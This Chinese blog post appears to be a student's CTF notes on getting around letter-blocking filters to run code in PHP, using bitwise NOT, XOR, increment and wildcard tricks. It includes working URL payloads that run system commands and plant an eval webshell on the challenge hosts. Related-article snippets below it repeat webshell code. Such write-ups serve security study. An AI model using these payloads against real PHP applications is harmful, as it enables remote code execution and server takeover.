无字母RCE绕过(取反,异或,自增,通配符)

最新推荐文章于 2024-09-12 16:40:17 发布
最新推荐文章于 2024-09-12 16:40:17 发布
阅读量734 收藏 7
点赞数 12
文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80307383/article/details/140725227
版权

原理参考:无数字字母rce总结(取反、异或、自增、临时文件)-CSDN博客

RCE篇之无数字字母rce - 学安全的小白 - 博客园 (cnblogs.com)

RCE通配符绕过-CSDN博客

以下是我的个人理解及例题

1.取反

例题:[SWPUCTF 2021 新生赛]hardrce | NSSCTF

取反用法就是对我们想要执行的语句通过取反符号"~"先准备好取反编码后语句,在通过(~)

写到url里达到绕过过滤a-z的目的,适用于没过滤"~"符号的题目

模型:?code=(语句1)(语句2)();

本题payload:

http://node5.anna.nssctf.cn:29866/?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0)();
http://node5.anna.nssctf.cn:29866/?wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98)();

 2.异或"^"

例题:BUUCTF在线评测 (buuoj.cn)里的RCEme(这题用取反也行)

异或“^”,通过该符号可以通过二进制异或操作将两个字符拼接为一个

规则:1^1=0,1^0=1,0^1=1,0^0=0

比如a的二进制是01100001

就可通过!         00100001

和          @          01000000

异或来得到

本题payload为

http://45462824-8ac4-45c7-aa10-db156ace2026.node5.buuoj.cn:81/?code=${%fe%fe%fe%fe^%a1%b9%bb%aa}[_](${%fe%fe%fe%fe^%a1%b9%bb%aa}[__]);&_=assert&__=eval($_POST[%27a%27])

但链接上蚁剑后,由于有disable_functions里面的flag文件无法读取,找的别人的wp

[极客大挑战 2019]RCE ME - 云千 - 博客园 (cnblogs.com)

3.自增

利用php中数组与字符串强制链接,数组会强制转化为Array这个字符,在通过+号来得到我们所需要的字符

例题:

[HNCTF 2022 Week1]Challenge__rce | NSSCTF

4.通配符

在Linux系统中可以使用 ? * 等字符来正则匹配字母星号

*号可以用来代替0个及以上任意字符

?号可以用来代替1个任意字符

例题:CTFHub里的hate_php

构造?><?= 语句?>

相当于?><?php echo 语句?>

本题payload:

?code=?><?=`/???/??? /????`?>

记嘚开心壹点
关注
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
CTF下的命令执行
Lemon's blog
04-28 9834
前言: 之前学习过命令执行,但不是太深入,这次通过题目的训练来深入学习一下命令执行
无数字字母rce总结(取反异或自增、临时文件)
A_991128a的博客
04-15 1072
目录取反异或自增临时文件大概思路有取反异或自增,临时文件推荐文章无字母数字webshell总结 - 先知社区如图示,对phpinfo取反,再取反,仍然得到phpinfo,但是可以利用它进行一些对数字字母过滤的绕过paylaod: (~%8F%97%8F%96%91%99%90)();像这样: shell: 异或 这里有一个异或构造的脚本, 相信聪明的你一看就知道怎么回事了 那么怎么利用呢? 像这样: 或 参考ctfshow web141payload大概这个样:?v1=1&v2=1&v3=%2b(“%
字母数字rce总结(自增取反异或、或、临时文件上传)
whale_waves的博客
02-29 2228
临时文件上传 通过上传文件然后用符号.调用执行文件 第一个知识点: 通过post上传文件,此时php会在linux里的零时文件夹保存文件,且文件一定是php加上六个随机的字符 /tmp/php?????? 这个应php保存的临时文件会有一个特性,就是这6个随机的字符会出现大写的情况 例如: 普通文件/tmp/adcabcabc php保存的临时文件/tmp/phpAvxAsa 第二个知识点: 现在直到了文件上传的位置以及特性那么现在要怎么利用它 shell下支持使用. 来
取反绕过异或绕过——CTF学习笔记
最新发布
2401_82847928的博客
09-12 2476
在CTF比赛中,我们会遇到一些RCE的题,题目过滤了字母和数字甚至有一些特殊符号也被过滤了。这个时候我们使用一般的绕过是毫无作用的,这个时候我们需要利用PHP和url传参的一些特性去构造payload,执行远程命令。
字母数字RCE
Shaun111的博客
11-06 1246
前言 当字母和数字都被过滤时怎样构造webshell呢?具体代码如下 <?php if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) { eval($_GET['shell']); } 首先,思路就是通过非字母数字的字符经过各种变换构造出任意字母,然后拼接出函数执行 异或 原理 在PHP中,两个变量的值进行异或时,会先将两个变量的值转换为ASCII,再将ASCII转换为二进制,再对二进制数据进行异或,再转为ASCII,最后转为字符串 用法
RCE-无字母数字绕过正则表达式
2301_78549931的博客
08-13 1183
我们可以通过一些不可见字符进行异或运算得到我们的字母(例如s=urldecode(%08)^urldecode(%7b)),这样是不是就绕过了waf。所以我们只需使用上述方法构造出system("ipconfig"),便可以执行命令,这里可以编写一个简单的php脚本来获取。根据源码,我们发现它过滤了字母数字大小写,所以我们要想实现代码执行,得另想方法构造代码执行。接下来我们可以使用py脚本来获取我们想要构造的payload:、取反的话,基本上用的都是一个不可见字符,所有不会触发到。
命令执行小结
ashMOB的博客
01-05 2604
命令执行小结 文章目录命令执行小结代码执行命令执行绕过思路对单词的过滤无参数RCE目录更换尝试读取文件无数字字母RCE异或取反自增(*7.0.12以上版本不可使用*)上传临时文件getshell绕过重定向突破disable_function限制骚操作shell进阶绕过安全目录FFI 代码执行 通俗的来说是执行php的代码,经常需要利用命令执行有关的函数来读取flag 常用函数: eval() 例子: <?php eval($_GET['pass']) ?> assert() PHP
ctfshow web40-web60系统命令执行 wp
qq_56158055的博客
01-13 512
事先声明,本文只用来学习交流,不参与以任何商业形式的活动。本文不会出现flag。 web40 源码 发现过滤了所有数字,以及大部分的字符,但仔细观察可以发现,括号是中文的括号,因此我们可以利用这点,来进行无参RCE 可以利用p神的无参数RCE来做,利用localeconv()函数来做,也可以用异或取反来做。 我这边用的是get_defined_vars()函数。 get_defined_vars():返回由所有已定义变量所组成的数组 因此我们可以 发现一堆乱七八糟的 利用
ctfshow web入门 命令执行web29-web57详解
2401_84009549的博客
04-20 896
当print_r(scandir(pos(localeconv())));时,会返回当前目录,pos(localeconv())的值为"."将数组用array_reverse进行倒转,并用next将指针指向flag.php最后进行读取,列出两个整理起来就是。
字母RCE
qq_64201116的博客
06-23 1824
字母RCE你到底有多懂,看了也许会更进一步
字母数字绕过正则表达式--上传临时文件、异或、或、取反自增
unexpectedthing的博客
09-10 1104
文章目录 借用羽神的文章,转发是为了自己后面方便看 https://blog.csdn.net/miuzzx/article/details/108569080?spm=1001.2014.3001.5501
[极客大挑战 2019]RCE ME(取反异或绕过正则表达式、bypass disable_function)
热门推荐
qq_45521281的博客
04-21 1万+
题目进去后,很简单的代码,显然命令执行: 但是得要先绕过preg_match()中正则表达式的限制,一开始傻乎乎的直接传了个数组,妄图绕过preg_match(),这很显然是不行的。 附上大佬的文章:关于PHP正则的一些绕过方法 ...
字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反自增脚本)
羽的博客
10-18 1万+
题目例子 <?php error_reporting(0); highlight_file(__FILE__); $code=$_GET['code']; if(preg_match('/[a-z0-9]/i',$code)){ die('hacker'); } eval($code); 我们下面以命令system('ls')为例 一、异或 <?php /*author yu22x*/ $myfile = fopen("xor_rce.txt", "w"); $contents="
命令执行 rce各种绕过技巧_命令执行 被过滤,2024年最新赶紧学习一下
qq_58071132的博客
04-16 356
命令执行漏洞就是黑客可以直接在web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。命令执行漏洞成因命令执行漏洞形成的原因是web服务器对用户输入的命令安全监测不足,导致恶意代码被执行。接下来是各种命令执行的绕过技巧。
php rce绕过
m0_73973498的博客
10-08 3058
php?>是正和常情况下的标签,用于识别这是个php文件,但php也允许使用短标签和等价于
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值